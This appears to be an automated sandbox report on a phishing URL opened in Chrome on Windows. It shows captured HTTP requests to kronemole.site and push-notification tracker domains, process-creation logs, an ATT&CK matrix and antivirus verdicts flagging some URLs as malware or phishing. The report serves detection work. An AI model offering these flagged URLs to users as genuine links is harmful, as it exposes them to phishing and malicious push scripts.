              Source: global trafficHTTP traffic detected: GET /fim/3079-US/bc3bfbb60dc61c1d954c5dd8cb68cfc0.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/edcfe56a4c763bb53fec401fa03a135a.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /scripts/push/v9e118mez8 HTTP/1.1Host: trk-essursta.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/archive/company/1080/images/INES-wt.png HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/cbc458c2f5038386fc23f670d1cc7242.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/ec7283e9871151e7212a3f1c25ef4e43.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/c269e80114f9dc475a93e1d2e924e5f4.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/4472ed6a36bdd245e7f6835e6e29df47.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/412ed0e567678783f534c1638d0d2adf.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/bc3bfbb60dc61c1d954c5dd8cb68cfc0.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/5ab79569e48f195b913682012875bbbd.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /service-worker.js HTTP/1.1Host: kronemole.siteConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/cbc458c2f5038386fc23f670d1cc7242.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/c269e80114f9dc475a93e1d2e924e5f4.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/4472ed6a36bdd245e7f6835e6e29df47.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/ec7283e9871151e7212a3f1c25ef4e43.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /00751fdff8a0f3cf22b7cf59c24e5f09 HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/2ca755302a35b1e76ba6e2a0cc008202.ico HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; _ga_DKB9VH2QW4=GS1.1.1700585923.1.0.1700585923.0.0.0; _ga=GA1.1.148937489.1700585924
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/412ed0e567678783f534c1638d0d2adf.jpg HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; _ga_DKB9VH2QW4=GS1.1.1700585923.1.0.1700585923.0.0.0; _ga=GA1.1.148937489.1700585924
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/2ca755302a35b1e76ba6e2a0cc008202.ico HTTP/1.1Host: kronemole.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; _ga_DKB9VH2QW4=GS1.1.1700585923.1.0.1700585923.0.0.0; _ga=GA1.1.148937489.1700585924
              Source: global trafficHTTP traffic detected: GET //scripts/pg/v9e118mez8 HTTP/1.1Host: trk-amropode.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET //scripts/sw/v9e118mez8 HTTP/1.1Host: trk-amropode.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /register/event_log/v9e118mez8 HTTP/1.1Host: event.trk-essursta.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sRFYfFOdTkn4XB2&MD=7T2tkHb2 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412 HTTP/1.1Host: api.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://kronemole.siteSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kronemole.site/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412 HTTP/1.1Host: api.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sRFYfFOdTkn4XB2&MD=7T2tkHb2 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /cl/11677_md/2000/2794/2021/49922/7518 HTTP/1.1Host: leanschoolingclass.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: chromecache_94.2.drString found in binary or memory: f||g.length||k.length))return;var n={eh:d,ah:e,bh:f,Gh:g,Hh:k,Be:m,nb:b},p=z.YT,q=function(){yC(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=E.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(BC(w,"iframe_api")||BC(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!sC&&zC(x[A],n.Be))return Kc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
              Source: chromecache_108.2.dr, chromecache_94.2.drString found in binary or memory: return b}pC.F="internal.enableAutoEventOnTimer";var yc=da(["data-gtm-yt-inspected-"]),qC=["www.youtube.com","www.youtube-nocookie.com"],rC,sC=!1; equals www.youtube.com (Youtube)
              Source: chromecache_79.2.drString found in binary or memory: http://leanschoolingclass.wiki/
              Source: chromecache_85.2.drString found in binary or memory: https://api.taboola.com/2.0/json/
              Source: chromecache_108.2.dr, chromecache_94.2.drString found in binary or memory: https://cct.google/taggy/agent.js
              Source: chromecache_78.2.drString found in binary or memory: https://fontawesome.com
              Source: chromecache_78.2.drString found in binary or memory: https://fontawesome.com/license/free
              Source: chromecache_87.2.drString found in binary or memory: https://genialskin.click/?s1=351191&s2=1091114752&s3=1782&s4=3038&ow=&s10=3079
              Source: chromecache_80.2.dr, chromecache_72.2.drString found in binary or memory: https://getbootstrap.com)
              Source: chromecache_80.2.dr, chromecache_72.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
              Source: chromecache_80.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
              Source: chromecache_108.2.dr, chromecache_94.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
              Source: chromecache_94.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
              Source: chromecache_94.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
              Source: chromecache_108.2.dr, chromecache_94.2.drString found in binary or memory: https://td.doubleclick.net
              Source: chromecache_95.2.drString found in binary or memory: https://trk-amropode.com//scripts/pg/v9e118mez8
              Source: chromecache_95.2.drString found in binary or memory: https://trk-amropode.com//scripts/sw/v9e118mez8
              Source: chromecache_104.2.drString found in binary or memory: https://trk-essursta.com/scripts/push/v9e118mez8
              Source: chromecache_108.2.dr, chromecache_94.2.drString found in binary or memory: https://www.googletagmanager.com/a?id=
              Source: chromecache_94.2.drString found in binary or memory: https://www.merchant-center-analytics.goog/mc/collect
              Source: chromecache_94.2.drString found in binary or memory: https://www.youtube.com/iframe_api
              Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
              Source: unknownHTTPS traffic detected: 23.199.50.2:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.199.50.2:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49807 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_3180_667278475Jump to behavior
              Source: classification engineClassification label: mal64.phis.win@20/39@30/16
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2224,i,7768767200719892686,964844701438018418,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/7518
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2224,i,7768767200719892686,964844701438018418,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid AccountsWindows Management InstrumentationPath Interception1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
              Non-Application Layer Protocol
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
              Application Layer Protocol
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication1
              Ingress Tool Transfer
              Data DestructionVirtual Private ServerEmployee Names
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1345967 URL: https://adns2.blob.core.win... Startdate: 21/11/2023 Architecture: WINDOWS Score: 64 24 Antivirus detection for URL or domain 2->24 26 Yara detected HtmlPhish44 2->26 28 Yara detected Phisher 2->28 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49574 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 clients.l.google.com 142.251.16.139, 443, 49731 GOOGLEUS United States 11->18 20 www.google.com 142.251.16.147, 443, 49740, 49809 GOOGLEUS United States 11->20 22 15 other IPs or domains 11->22

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/75180%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cct.google/taggy/agent.js0%URL Reputationsafe
              https://www.merchant-center-analytics.goog/mc/collect0%URL Reputationsafe
              https://kronemole.site/fim/3079-US/5ab79569e48f195b913682012875bbbd.jpg0%Avira URL Cloudsafe
              https://kronemole.site/assets/vendors/fontawesome/css/all.css0%Avira URL Cloudsafe
              https://kronemole.site/fim/3079-US/edcfe56a4c763bb53fec401fa03a135a.jpg0%Avira URL Cloudsafe
              https://kronemole.site/assets/css/isp/common.css?v=3cc6aa721bc3b8a31b45d9388214360e0%Avira URL Cloudsafe
              https://kronemole.site/assets/js/vendor/jquery-3.4.1.min.js0%Avira URL Cloudsafe
              https://kronemole.site/assets/js/functions.js?v=3cc6aa721bc3b8a31b45d9388214360e0%Avira URL Cloudsafe
              https://kronemole.site/fim/3079-US/412ed0e567678783f534c1638d0d2adf.jpg0%Avira URL Cloudsafe
              https://kronemole.site/assets/js/vendor/bootstrap/css/bootstrap.min.css0%Avira URL Cloudsafe
              http://leanschoolingclass.wiki/cl/11677_md/2000/2794/2021/49922/75180%Avira URL Cloudsafe
              https://kronemole.site/fim/3079-US/2ca755302a35b1e76ba6e2a0cc008202.ico0%Avira URL Cloudsafe
              https://kronemole.site/fim/3079-US/c269e80114f9dc475a93e1d2e924e5f4.jpg0%Avira URL Cloudsafe
              https://kronemole.site/assets/js/isp/common.js?v=3cc6aa721bc3b8a31b45d9388214360e0%Avira URL Cloudsafe
              https://humifications.com/0/2/41423/3af5e0a6c068554b3d8550e8c2d39e93/2000/11677_1/49922_7518_2794_32559_md0%Avira URL Cloudsafe
              https://event.trk-essursta.com/register/event_log/v9e118mez8100%Avira URL Cloudmalware
              https://trk-amropode.com//scripts/pg/v9e118mez80%Avira URL Cloudsafe
              https://trk-essursta.com/scripts/push/v9e118mez8100%Avira URL Cloudmalware
              https://kronemole.site/assets/js/vendor/bootstrap/js/bootstrap.min.js0%Avira URL Cloudsafe
              https://kronemole.site/assets/vendors/fontawesome/webfonts/fa-solid-900.woff20%Avira URL Cloudsafe
